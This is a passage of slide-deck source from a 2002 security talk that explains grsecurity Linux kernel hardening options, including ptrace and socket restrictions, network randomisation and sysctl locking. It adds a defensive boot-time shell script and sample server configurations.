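    printf("%s: %s\n", path, ok ? "allowed" : "denied");
    return ok ? 0 : 1;
}
```

Note what the check does not cover, which is exactly the slides' caveat: a script handed to /usr/bin/perl passes, because the program being exec'ed is the trusted interpreter, not the untrusted file.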
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Restricted ptrace
%font "code"
CONFIG_GRKERNSEC_PTRACE
%font "standard"
	Restricts ptrace() calls to root
		tracing of system calls inside the kernel is disabled too
		the ptrace() calls that are allowed are logged
	ptrace() is unused on a great many systems (only debuggers and tracers such as gdb and strace need it)
	Prevents
		stealing information from other processes
		altering the execution of other processes
%%%font "code"
%% If you say Y here, no one but root will be able to ptrace processes.
%% Tracing syscalls inside the kernel will also be disabled. All allowed
%% ptraces will be logged when this option is enabled. If the sysctl
%% option is enabled, a sysctl option with name "restrict_ptrace" is
%% created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Allow ptrace for group
%font "code"
CONFIG_GRKERNSEC_PTRACE_GROUP
%font "standard"
	Allows one group to call ptrace()
	Requires "Restricted ptrace"
%cont, font "code"
CONFIG_GRKERNSEC_PTRACE
%font "standard"
%%%font "code"
%% If you say Y here, you will be able to choose a GID of whose users
%% will be able to ptrace. If the sysctl option is enabled, a sysctl
%% option with name "allow_ptrace_group" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
GID for ptrace
%font "code"
CONFIG_GRKERNSEC_PTRACE_GID 1008
%font "standard"
	Specifies the group allowed to call ptrace()
	Requires "Restricted ptrace"
%cont, font "code"
CONFIG_GRKERNSEC_PTRACE
%font "standard"
%%%font "code"
%% Here you can choose the GID of whose users will be able to ptrace.
%% Remember to add the users you want ptrace enabled for to the GID
%% specified here. If the sysctl option is enabled, whatever you choose
%% here won't matter. You'll have to specify the GID in your bootup
%% script by echoing the GID to the proper /proc entry. View the help
%% on the sysctl option for more information.
%% If the sysctl option is
%% enabled, a sysctl option with name "ptrace_gid" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Option group 6/8
%cont, fore "grey40"
Buffer Overflow Protection
%cont, fore "grey40"
Access Control Lists
%cont, fore "grey40"
Filesystem Protections
%cont, fore "grey60"
Kernel Auditing
%cont, fore "grey80"
Executable Protections
%cont, fore "green"
Network Protections
Sysctl support
Miscellaneous Enhancements
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Randomized IP IDs
%font "code"
CONFIG_GRKERNSEC_RANDID
%font "standard"
	Makes the ID field of outgoing IP packets fully random
	A port of the OpenBSD generator
	Not very useful
		the default Linux generator already sets the ID field to zero on packets carrying the DF bit
		that is on TCP syn/ack and rst segments and on short UDP datagrams
%%%font "code"
%% If you say Y here, all the id field on all outgoing packets
%% will be randomized. This hinders os fingerprinters and
%% keeps your machine from being used as a bounce for an untraceable
%% portscan. Ids are used for fragmented packets, fragments belonging
%% to the same packet have the same id. By default linux only
%% increments the id value on each packet sent to an individual host.
%% We use a port of the OpenBSD random ip id code to achieve the
%% randomness, while keeping the possibility of id duplicates to
%% near none. If the sysctl option is enabled, a sysctl option with name
%% "rand_ip_ids" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Randomized TCP source ports
%font "code"
CONFIG_GRKERNSEC_RANDSRC
%font "standard"

	Makes the source port number generated by the kernel fully random
	Makes data-theft attacks against protocols such as passive FTP more complex
%%%font "code"
%% If you say Y here, situations where a source port is generated on the
%% fly for the TCP protocol (ie. with connect() ) will be altered so that
%% the source port is generated at random, instead of a simple incrementing
%% algorithm. If the sysctl option is enabled, a sysctl option with name
%% "rand_tcp_src_ports" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Altered Ping IDs
%font "code"
CONFIG_GRKERNSEC_RANDPING
%font "standard"

	The icmp.id field of the generated ICMP echo reply packets is identical to the icmp.id field of the received ICMP echo request packets
	Makes remote identification of the IP stack more complex
%%%font "code"
%% If you say Y here, the way Linux handles echo replies will be changed
%% so that the reply uses an ID equal to the ID of the echo request.
%% This will help in confusing OS detection. If the sysctl option is
%% enabled, a sysctl option with name "altered_pings" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Randomized TTL
%font "code"
CONFIG_GRKERNSEC_RANDTTL
%font "standard"

	Makes the TTL field of the generated IP packets fully random
	Makes remote identification of the IP stack more complex
	Mapping out the access architecture is not made any more complex
%%%font "code"
%% If you say Y here, your TTL (time to live) for packets will be set at
%% random, with a base level you specify, to further confuse OS detection.
%% If the sysctl option is enabled, a sysctl option with name "rand_ttl"
%% is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
TTL starting point
%font "code"
CONFIG_GRKERNSEC_RANDTTL_THRESH 64
%font "standard"

	Allows choosing the smallest TTL field value to be generated
	Requires "Randomized TTL"
%cont, font "code"
 CONFIG_GRKERNSEC_RANDTTL
%font "standard"
%%%font "code"
%% Here you can choose a base TTL for the randomization. The default value
%% for this setting is the Linux default TTL. Most users will want to
%% leave this setting as-is. The higher you set the base level (note that
%% you can't set it above 255) the more hops your packets will live.
%% If the sysctl option is enabled, whatever you choose here won't matter.
%% You'll have to specify the threshold in your bootup script by echoing
%% the threshold to the proper /proc entry. View the help on the sysctl
%% option for more information. If the sysctl option is enabled, a sysctl
%% option with name "rand_ttl_thresh" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Socket restrictions
%font "code"
CONFIG_GRKERNSEC_SOCKET
%font "standard"

	Gives access to options for restricting Internet sockets
%%%font "code"
%% If you say Y here, you will be able to choose from several options.
%% If you assign a GID on your system and add it to the supplementary
%% groups of users you want to restrict socket access to, this patch
%% will perform up to three things, based on the option(s) you choose.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Deny any sockets to group
%font "code"
CONFIG_GRKERNSEC_SOCKET_ALL
%font "standard"

	Forbids a given group from opening client and server sockets
	Requires "Socket restrictions"
%cont, font "code"
 CONFIG_GRKERNSEC_SOCKET
%font "standard"
%%%font "code"
%% If you say Y here, you will be able to choose a GID of whose users will
%% be unable to connect to other hosts from your machine or run server
%% applications from your machine. If the sysctl option is enabled, a
%% sysctl option with name "socket_all" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
GID to deny all sockets for
%font "code"
CONFIG_GRKERNSEC_SOCKET_ALL_GID 1004
%font "standard"

	Specifies the group forbidden from opening client and server sockets
	Requires "Deny any sockets to group"
%cont, font "code"
 CONFIG_GRKERNSEC_SOCKET_ALL
%font "standard"
%%%font "code"
%% Here you can choose the GID to disable socket access for. Remember to
%% add the users you want socket access disabled for to the GID
%% specified here. If the sysctl option is enabled, whatever you choose
%% here won't matter. You'll have to specify the GID in your bootup
%% script by echoing the GID to the proper /proc entry. View the help
%% on the sysctl option for more information. If the sysctl option is
%% enabled, a sysctl option with name "socket_all_gid" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Deny client sockets to group
%font "code"
CONFIG_GRKERNSEC_SOCKET_CLIENT
%font "standard"

	Forbids a given group from opening client sockets
	Requires "Socket restrictions"
%cont, font "code"
 CONFIG_GRKERNSEC_SOCKET
%font "standard"
%%%font "code"
%% If you say Y here, you will be able to choose a GID of whose users will
%% be unable to connect to other hosts from your machine, but will be
%% able to run servers. If this option is enabled, all users in the group
%% you specify will have to use passive mode when initiating ftp transfers
%% from the shell on your machine. If the sysctl option is enabled, a
%% sysctl option with name "socket_client" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
GID to deny client sockets for
%font "code"
CONFIG_GRKERNSEC_SOCKET_CLIENT_GID 1003
%font "standard"

	Specifies the group forbidden from opening client sockets
	Requires "Deny client sockets to group"
%cont, font "code"
 CONFIG_GRKERNSEC_SOCKET_CLIENT
%font "standard"
%%%font "code"
%% Here you can choose the GID to disable client socket access for.
%% Remember to add the users you want client socket access disabled for to
%% the GID specified here. If the sysctl option is enabled, whatever you
%% choose here won't matter. You'll have to specify the GID in your bootup
%% script by echoing the GID to the proper /proc entry. View the help
%% on the sysctl option for more information. If the sysctl option is
%% enabled, a sysctl option with name "socket_client_gid" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Deny server sockets to group
%font "code"
CONFIG_GRKERNSEC_SOCKET_SERVER
%font "standard"

	Forbids a given group from opening server sockets
	Requires "Socket restrictions"
%cont, font "code"
 CONFIG_GRKERNSEC_SOCKET
%font "standard"
%%%font "code"
%% If you say Y here, you will be able to choose a GID of whose users will
%% be unable to run server applications from your machine. If the sysctl
%% option is enabled, a sysctl option with name "socket_server" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
GID to deny server sockets for
%font "code"
CONFIG_GRKERNSEC_SOCKET_SERVER_GID 1002
%font "standard"

	Specifies the group forbidden from opening server sockets
	Requires "Deny server sockets to group"
%cont, font "code"
 CONFIG_GRKERNSEC_SOCKET_SERVER
%font "standard"
%%%font "code"
%% Here you can choose the GID to disable server socket access for.
%% Remember to add the users you want server socket access disabled for to
%% the GID specified here. If the sysctl option is enabled, whatever you
%% choose here won't matter. You'll have to specify the GID in your bootup
%% script by echoing the GID to the proper /proc entry. View the help
%% on the sysctl option for more information. If the sysctl option is
%% enabled, a sysctl option with name "socket_server_gid" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Option group 7/8

%cont, fore "grey40"
	Buffer Overflow Protection
%cont, fore "grey40"
	Access Control Lists
%cont, fore "grey40"
	Filesystem Protections
%cont, fore "grey40"
	Kernel Auditing
%cont, fore "grey60"
	Executable Protections
%cont, fore "grey80"
	Network Protections
%cont, fore "green"
	Sysctl support
	Miscellaneous Enhancements
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Sysctl support
%font "code"
CONFIG_GRKERNSEC_SYSCTL
%font "standard"

	Enables support for dynamic configuration of the grsecurity options that are present
		A /proc/sys/kernel/grsecurity tree is created, with one pseudo-file per option
	If this option is enabled, then all the options are disabled by default
	A grsec_lock entry makes all the entries unmodifiable
		To be changed only after the other entries have been configured
%%%font "code"
%% If you say Y here, you will be able to change the options that
%% grsecurity runs with at bootup, without having to recompile your
%% kernel. You can echo values to files in /proc/sys/kernel/grsecurity
%% to enable (1) or disable (0) various features. All the sysctl entries
%% are mutable until the "grsec_lock" entry is set to a non-zero value.
%% All features are disabled by default. Please note that this option could
%% reduce the effectiveness of the added security of this patch if an ACL
%% system is not put in place. Your init scripts should be read-only, and
%% root should not have access to adding modules or performing raw i/o
%% operations. All options should be set at startup, and the grsec_lock
%% entry should be set to a non-zero value after all the options are set.
%% *THIS IS EXTREMELY IMPORTANT*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Option group 8/8

%cont, fore "grey40"
	Buffer Overflow Protection
%cont, fore "grey40"
	Access Control Lists
%cont, fore "grey40"
	Filesystem Protections
%cont, fore "grey40"
	Kernel Auditing
%cont, fore "grey40"
	Executable Protections
%cont, fore "grey60"
	Network Protections
%cont, fore "grey80"
	Sysctl support
%cont, fore "green"
	Miscellaneous Enhancements
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
BSD-style coredumps
%font "code"
CONFIG_GRKERNSEC_COREDUMP
%font "standard"

	Changes the name of coredump files
		under Linux every coredump file is called core
		under *BSD every coredump file is called core.processName
	With this option coredump files are called core.processName
	Core files are generated in the application's current directory
		This option can make it possible to recover the coredump files of several different applications running in the same directory
%%%font "code"
%% If you say Y here, linux will use a style similar to BSD for
%% coredumps, core.processname. Not a security feature, just
%% a useful one. If the sysctl option is enabled, a sysctl option with
%% name "coredump" is created.
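%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Boot-time sysctl script (added example)

The shell script below is an added example written for this presentation; it is not part of the grsecurity patch or of its documentation. It implements the sequence that the "Sysctl support" help text insists on: at startup, write every entry under /proc/sys/kernel/grsecurity (feature flags, the ptrace and socket GIDs, the TTL threshold), and only then set grsec_lock to a non-zero value, because from that write on the kernel rejects any further change. The entry names and the GIDs 1008, 1004, 1003 and 1002 are the ones shown on the slides; the GRSEC_ROOT variable, the function names and the refusal-after-lock check in grsec_set are the example's own assumptions (the check mirrors what the kernel does, so that the ordering can be exercised against a scratch directory instead of the real /proc tree).

```shell
#!/bin/sh
# Added example: set grsecurity sysctl entries at boot, then lock them.
# Not grsecurity's own script. GRSEC_ROOT normally points at the real
# /proc tree; point it at a scratch directory to dry-run the script.
GRSEC_ROOT="${GRSEC_ROOT:-/proc/sys/kernel/grsecurity}"

# name=value pairs, in write order. The names come from the
# CONFIG_GRKERNSEC_* help texts; the GIDs are the slide values
# (1008 ptrace, 1004/1003/1002 sockets). grsec_lock is deliberately
# NOT listed here: it is written separately, as the very last step.
GRSEC_SETTINGS="
restrict_ptrace=1
allow_ptrace_group=1
ptrace_gid=1008
rand_tcp_src_ports=1
altered_pings=1
rand_ttl=1
rand_ttl_thresh=64
socket_all=1
socket_all_gid=1004
socket_client=1
socket_client_gid=1003
socket_server=1
socket_server_gid=1002
coredump=1
"

# grsec_get NAME: print the current value of an entry, nothing if absent.
grsec_get() {
    if [ -r "$GRSEC_ROOT/$1" ]; then
        cat "$GRSEC_ROOT/$1"
    fi
}

# grsec_set NAME VALUE: write VALUE to an entry.
# Refuses if the entry is missing (option not compiled in) or if
# grsec_lock is already non-zero. The kernel rejects such writes;
# reproducing the check here (assumption of this example) means an
# ordering mistake is caught even when dry-running in a scratch tree.
grsec_set() {
    if [ ! -e "$GRSEC_ROOT/$1" ]; then
        echo "grsec: no entry '$1' (option not compiled in?)" >&2
        return 1
    fi
    case "$(grsec_get grsec_lock)" in
        ""|0) ;;
        *) echo "grsec: refusing to set '$1': grsec_lock already set" >&2
           return 1 ;;
    esac
    echo "$2" > "$GRSEC_ROOT/$1"
}

# grsec_configure: apply every setting, then lock. Stops at the first
# entry that cannot be written and leaves grsec_lock untouched, so a
# half-configured system is never locked into that state.
grsec_configure() {
    for kv in $GRSEC_SETTINGS; do
        grsec_set "${kv%%=*}" "${kv#*=}" || return 1
    done
    grsec_set grsec_lock 1
}

# grsec_verify: re-read every setting (and grsec_lock) and report any
# mismatch on stderr. Returns 0 only if everything reads back as set.
grsec_verify() {
    rc=0
    for kv in $GRSEC_SETTINGS grsec_lock=1; do
        if [ "$(grsec_get "${kv%%=*}")" != "${kv#*=}" ]; then
            echo "grsec: ${kv%%=*} is '$(grsec_get "${kv%%=*}")', want '${kv#*=}'" >&2
            rc=1
        fi
    done
    return $rc
}
```

The script is meant to be called from an init script that is itself read-only, as the help text requires. The GIDs written to ptrace_gid and to the socket_*_gid entries only have an effect on users whose supplementary groups include them, so the groups have to exist and the users have to be added to them (groupadd / usermod -a -G) before the restrictions mean anything; grsec_verify after grsec_configure gives a cheap boot-time check that nothing was silently skipped.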
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
A few concrete cases

	A home user's server
	The e-commerce server
	The NSA server
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
A home user's server

	+ Buffer Overflow Protection
	- Access Control Lists
	+ Filesystem Protections
	- Kernel Auditing
	- Executable Protections
	- Network Protections
	- Sysctl support
	- Miscellaneous Enhancements

	Buffer Overflow Protection: PaX is the one to choose, because the mmap protection is missing from the port of the openwall patch
	In fact, here the openwall patch is recommendable because it includes
		the protection against the executable stack, with emulation of trampoline jumps
		the mmap protection
		the protection of temporary files
		the protection of inputs/outputs
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
The e-commerce server

	+ Buffer Overflow Protection
	- Access Control Lists
	+ Filesystem Protections
	+ Kernel Auditing
		limited to one well-defined group
	- Executable Protections
		+ Trusted path execution
	- Network Protections
		+ Socket restrictions (where this is applicable)
	- Sysctl support
	+ Miscellaneous Enhancements

%cont, fore "red"
Warning
%cont, fore "white"
: nothing protects against perl/asp scripts written in a hurry at the back of a garage... here the only protections are:
	the
%cont, fore "green"
 secure design
%cont, fore "grey75"
 from the very start of the project
	the
%cont, fore "green"
 code audit
%cont, fore "grey75"
 throughout the whole project
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
The NSA server

	+ Buffer Overflow Protection
	+ Access Control Lists
	+ Filesystem Protections
	+ Kernel Auditing
		not limited to a group
	+ Executable Protections
	+ Network Protections
		Except Randomized IP IDs, TTL and Altered Ping IDs
	- Sysctl support
	+ Miscellaneous Enhancements

	It's a joke: the NSA prefers to use Windows because it's more better well certified...
%cont, fore "green"
;-)
%fore "white"
	let's say it is a server holding ultra-sensitive information
	"Except Randomized IP IDs, TTL and Altered Ping IDs" because these only make identifying the system harder, which can be achieved by many other means...
	"Sysctl support": once the right options have been chosen, they do not need to be modified
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Conclusion

	There are useful things
		to protect oneself temporarily from flaws that are not yet known, while waiting for the update
		to make the attackers' task more complex
		to allow the detection of abnormal behaviour
	Depending on the required level, the number of options to enable varies
		some options cannot be applied to systems that are too complex
		a single person cannot properly manage all the logging generated by the auditing
	This does not dispense with
		well-chosen and well-configured daemons
		hardening the system, which is a mandatory prerequisite
			bastille linux can be a good start: http://www.bastille-linux.org/
			otherwise it will be possible to become root locally and to bypass many of the protections
		updates as fast as possible, as soon as any vulnerability becomes known
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Thank you for your attention
%rcutin, size 7, pause
You can ask your questions...
%size 4
%rcutin, size 6
and make your remarks known...
%size 4
%rcutin, right, size 5
even by electronic mail.
%size 4
%rcutin, left, size 3, pause
then quietly wake up those who are asleep ;-)
%size 4
%rcutin, center, size 5
Bye, bye...
%size 4
%right
(c) 01/2002 Denis Ducamp / HSC for RÉSIST 2002